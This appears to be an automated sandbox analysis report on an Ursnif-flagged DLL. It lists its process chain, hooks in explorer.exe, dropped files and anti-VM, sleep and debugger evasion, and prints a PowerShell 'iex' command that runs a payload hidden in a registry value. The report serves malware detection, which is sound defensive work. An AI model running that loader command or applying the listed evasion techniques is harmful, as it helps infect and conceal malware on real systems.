Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.440194854.000000000DE20000.00000002.00000001.sdmp
Source: Binary string: Y:\ruach\endeared\unroaded\warl\homolographic\palpableness.pdb source: regsvr32.exe
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.pdb source: powershell.exe, 00000016.00000002.479178421.0000020E9417E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.429818290.0000000005E10000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: explorer.exe, 0000001E.00000003.475607215.0000000006C40000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.429818290.0000000005E10000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: explorer.exe, 0000001E.00000003.475607215.0000000006C40000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000001F.00000002.447514159.000002090E7CC000.00000004.00000040.sdmp
Source: Binary string: Y:\ruach\endeared\unroaded\warl\homolographic\palpableness.pdb source: regsvr32.exe, 00000001.00000002.484369961.0000000004930000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000001F.00000002.447514159.000002090E7CC000.00000004.00000040.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.pdbXP source: powershell.exe, 00000016.00000002.479298049.0000020E941EB000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.440194854.000000000DE20000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
PE file contains an invalid checksum
Source: q3xypckz.dll.24.dr Static PE information: real checksum: 0x0 should be: 0x156e
Source: vnaSKDMnLG.dll Static PE information: real checksum: 0x42d78 should be: 0x3f8ff
Source: chv50z53.dll.26.dr Static PE information: real checksum: 0x0 should be: 0x35c9
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A8B09B push ecx; ret 1_2_04A8B0AB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A8ACE0 push ecx; ret 1_2_04A8ACE9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493009C push dword ptr [ebp-000000D8h]; ret 1_2_04930252
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493009C push dword ptr [ebp-000000E0h]; ret 1_2_0493029C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493009C push dword ptr [esp+10h]; ret 1_2_049303AB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04930005 push dword ptr [ebp-000000D8h]; ret 1_2_04930065
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04930066 push dword ptr [ebp-000000D8h]; ret 1_2_0493009B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049303AC push dword ptr [esp+0Ch]; ret 1_2_049303BF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049303AC push dword ptr [esp+10h]; ret 1_2_04930404

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6968, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFFAC2D521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFFAC2D5200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5743
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3025
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4404 Thread sleep time: -7378697629483816s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\SysWOW64\WerFault.exe File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A842B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_04A842B4
Source: explorer.exe, 0000001E.00000000.437556746.0000000008C73000.00000004.00000001.sdmp Binary or memory string: 30d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000001E.00000002.527114908.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000015.00000002.387243962.000001AB9F6F5000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[h
Source: explorer.exe, 0000001E.00000000.437180572.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000001E.00000000.437180572.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000001E.00000000.433905320.00000000069DB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort Jump to behavior
